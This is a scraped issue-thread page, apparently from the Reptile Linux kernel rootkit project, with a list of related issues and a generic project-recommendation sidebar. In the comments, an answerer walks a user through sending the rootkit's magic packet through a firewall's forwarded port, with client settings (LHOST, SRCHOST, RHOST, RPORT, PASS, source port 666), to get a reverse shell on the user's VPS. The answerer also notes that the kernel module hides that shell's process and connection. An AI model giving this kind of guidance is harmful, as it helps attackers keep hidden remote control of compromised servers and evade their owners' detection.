Comments (7)
As you aren't getting problems with the reversing connection, I will assume you are able to figure this part out.
So your only problem is the magic packet. You need to get sure how the firewall is working and doing the NAT redirect. Obviously ICMP won't work, because NAT normally doesn't forward those packets.
You have to figure out what port the firewall is routing to the target server, and send the magic packet on this port. I recommend you use SRCHOST equal to your LHOST, because you can get some trouble with src spoofing in some firewall rules.
Ex.: If the server is an webserver behind a firewall, you can send your magic packet through port 80 or 443 (tcp obviously) with srchost == lhost, and get your reverse shell in your VPS.
I hope I helped you.
from reptile.
So, when I did setup, I choosed default port 666, now I should change this to 80, right? How I can change it? Where is the config on server after installation?
from reptile.
The default port 666 is the source port, not the remote port. The reptile accepts magic packet on any tcp port you want, but the source porte has to be 666.
So, use the client
to setup the packet for you in your VPS and do the configuration below:
set LHOST [your ip]
set SRCHOST [your ip]
set RHOST [target ip]
set RPORT [target port]
set PROT tcp
set PASS [your pass chosen]
note: SRCPORT must keep 666.
and type run
. It should be get your reverse shell.
from reptile.
It works! Thank you a lot! Next question, how to remove ./reverse from autorun and uninstall correctly?
from reptile.
1 - disable the file tampering feature with /reptile/reptile_cmd file-tampering
2 - comment the line of reptile_reverse
in the file /reptile/reptile_start
3 - enable again the file tampering /reptile/reptile_cmd file-tampering
To uninstall reptile you only need to run setup.sh remove
but you will have to reboot the system to complete the uninstallation.
from reptile.
When I installed first time with magic packet, I did not remove it, and installed again just reverse in root directory. Should I just remove /root/Reptile folder? Because reverse is run from /root/Reptile, not from /reptile/, or those commands that you wrote upper it’s important?
from reptile.
When you send the magic packet, the kernel module will run /reptile/reptile_reverse
. So if you are running by hand in /root/Reptile, you can run by hand in /reptile too. So you can remove this /root/Reptile.
And there is another detail: /reptile/repitle_reverse is compiled to run with kernel module, so, it communicates with kernel module to hide its process and its connection. If you've compiled reverse
in standalone version, it will works, but won't communicate with kernel module, in other words, is better use the /reptile/reptile_reverse
when you already have the kernel module installed.
from reptile.
Related Issues (20)
- is there gonna be kernel 5.X support? HOT 7
- make error: implicit declaration of function 'memzero_explicit' [-Werror=implicit-function-declaration] HOT 2
- tty hangs while rmmod HOT 2
- Error on running make
- Personal doubts
- Error during "make install" HOT 1
- Error with "kallsyms_on_each_symbol" at make HOT 1
- error on redhat 7
- How to prevent detection
- copy_from_user cause system crash on centos7.8 HOT 1
- Installing Error on Parrot OS HOT 1
- 12312
- i want about detali usage. HOT 1
- Failed to insmod
- failed to make on centos 7 HOT 2
- help
- About memory leaks(关于内存泄漏)
- Reptile-master/kernel/include/config.h:26:25: error: expected ‘)’ before ‘HIDE’ HOT 1
- Can't open reptile_module.ko for reading HOT 4
- AMZN Connection Hide
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from reptile.